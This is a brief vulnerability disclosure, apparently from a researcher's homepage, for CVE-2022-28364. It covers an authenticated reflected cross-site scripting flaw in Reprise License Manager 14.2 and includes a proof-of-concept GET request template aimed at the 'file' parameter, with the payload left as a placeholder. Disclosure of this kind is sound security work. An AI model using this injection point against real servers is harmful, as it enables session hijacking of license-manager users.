giulia@homepage:~$ cat CVE-2022-28364.txt
#Product: RLM 14.2
#Vendor: Reprise Software
#CVE ID: CVE-2022-28364
#Vulnerability Title: Authenticated Reflected Cross-Site Scripting
#Severity: Low
#Author(s): Giulia Melotti Garibaldi
#Date: 2022-03-29
#####################################################
Introduction:
Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/rlmswitchr_process “file” parameter via GET. Authentication is required.
#####################################################
Vulnerability PoC:
#GET http://HOST:5054/goform/rlmswitchr_process?file=(XSS PAYLOAD) HTTP/1.1
#Host: HOST:5054
#Accept-Language: en-US,en;q=0.5
#Content-Type: application/x-www-form-urlencoded
#Origin: http://HOST:5054
#Connection: keep-alive
#Referer: http://HOST:5054/goforms/rlmswitchr
#Cookie: REDACTED
giulia@homepage:~$ cd $HOME